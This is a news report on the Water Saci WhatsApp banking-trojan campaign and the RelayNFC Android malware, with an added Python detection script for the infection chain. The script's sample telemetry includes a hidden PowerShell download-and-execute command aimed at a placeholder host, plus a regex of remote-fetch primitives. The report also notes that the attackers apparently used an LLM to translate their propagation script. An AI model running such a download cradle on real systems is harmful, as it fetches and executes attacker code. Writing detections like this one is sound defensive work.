Brazilian users have been targeted by a multi-stage campaign that uses WhatsApp messages and attachments to deliver a banking trojan, Trend Micro researchers said. The operator, tracked as Water Saci, has shifted from PowerShell to a Python-based propagation script and now employs HTML Application (HTA) files and PDFs in a layered infection chain that researchers say increases delivery speed and resilience.
In the observed attacks, victims receive messages from trusted contacts on WhatsApp that include malicious PDFs or HTA attachments. The PDF lures instruct recipients to “update” Adobe Reader via an embedded link, while opening HTA files runs a Visual Basic Script that executes PowerShell commands to fetch next-stage payloads from remote servers, including an MSI installer and a Python script used to spread the malware through WhatsApp Web sessions.
The MSI installer acts as a delivery mechanism that launches an AutoIt script to install the banking trojan and enforce single-instance execution by checking for a marker file named “executed.dat” and notifying an attacker-controlled server identified in the research. AutoIt artifacts also check whether the Windows system language is Portuguese (Brazil) before scanning for banking-related folders and artifacts tied to major Brazilian financial apps.
Researchers reported additional reconnaissance that includes scanning Google Chrome browsing history for visits to a hard-coded list of banks and using Windows Management Instrumentation (WMI) queries to collect host information. The delivery chain can decrypt and inject intermediate loader files into a hollowed svchost.exe process or, if alternate artifacts are present, load the banking trojan directly into process memory.
The deployed trojan monitors active window titles for banking, payment or cryptocurrency platforms, can terminate browsers to force victims to reopen sites under attacker conditions, and supports capabilities such as credential overlays, keyboard capture, screen capture, mouse simulation and file transfer. The malware establishes persistence through Registry modifications, uses anti-virtualization checks, and communicates with command-and-control infrastructure identified by researchers.
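The chain described above (HTA spawning PowerShell with a download cradle, an MSI launching AutoIt, and the "executed.dat" marker file) can be expressed as simple host-telemetry rules. The following is an added example written for this page, not code from Trend Micro or the campaign; the Sysmon-like field names and the sample events are constructed assumptions, and the URL is a placeholder.

```python
"""Constructed detection example: flags the HTA -> PowerShell -> MSI/AutoIt
chain and the single-instance marker file over process-creation and
file-creation events. Field names follow an assumed, Sysmon-like schema."""
import re

# Constructed sample telemetry, not real events from the campaign.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/stage')\""},
    {"type": "process", "parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Users\Public\AutoIt3.exe", "cmdline": "AutoIt3.exe stage.a3x"},
    {"type": "file", "image": r"C:\Users\Public\AutoIt3.exe",
     "path": r"C:\Users\Public\executed.dat"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Common PowerShell remote-fetch primitives used as a "download cradle" signal.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return a detection label for one event, or None when it looks benign."""
    if event["type"] == "process":
        parent, image = basename(event["parent"]), basename(event["image"])
        # HTA host launching PowerShell that reaches out for a next stage.
        if (parent == "mshta.exe" and image in ("powershell.exe", "pwsh.exe")
                and DOWNLOAD_CRADLE.search(event["cmdline"])):
            return "hta_spawns_powershell_download"
        # MSI installer acting as a launcher for an AutoIt interpreter.
        if parent == "msiexec.exe" and image.startswith("autoit3"):
            return "msi_launches_autoit"
    elif event["type"] == "file" and basename(event["path"]) == "executed.dat":
        # Marker file the report describes for single-instance enforcement.
        return "single_instance_marker_file"
    return None


def detect(events: list) -> list:
    """Labels of all flagged events, in input order."""
    return [label for e in events if (label := classify(e)) is not None]
```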
Trend Micro noted the propagation script was ported from PowerShell to Python and said there is compelling evidence the actors may have used a large language model or code-translation tool to assist the conversion, pointing to functional similarities and console output artifacts. The research warned this approach helps the operator automate and maintain WhatsApp-based propagation at scale.
Separately, Brazilian banking users are also being targeted by a previously undocumented Android malware family dubbed RelayNFC that implements a real-time APDU relay channel to enable contactless payment fraud, Cyble said. RelayNFC, built with React Native and Hermes bytecode and spread via phishing that leads to decoy Portuguese-language sites, collects card data and PINs and relays APDU commands to complete transactions remotely; researchers also found an experimental APK related to Host Card Emulation.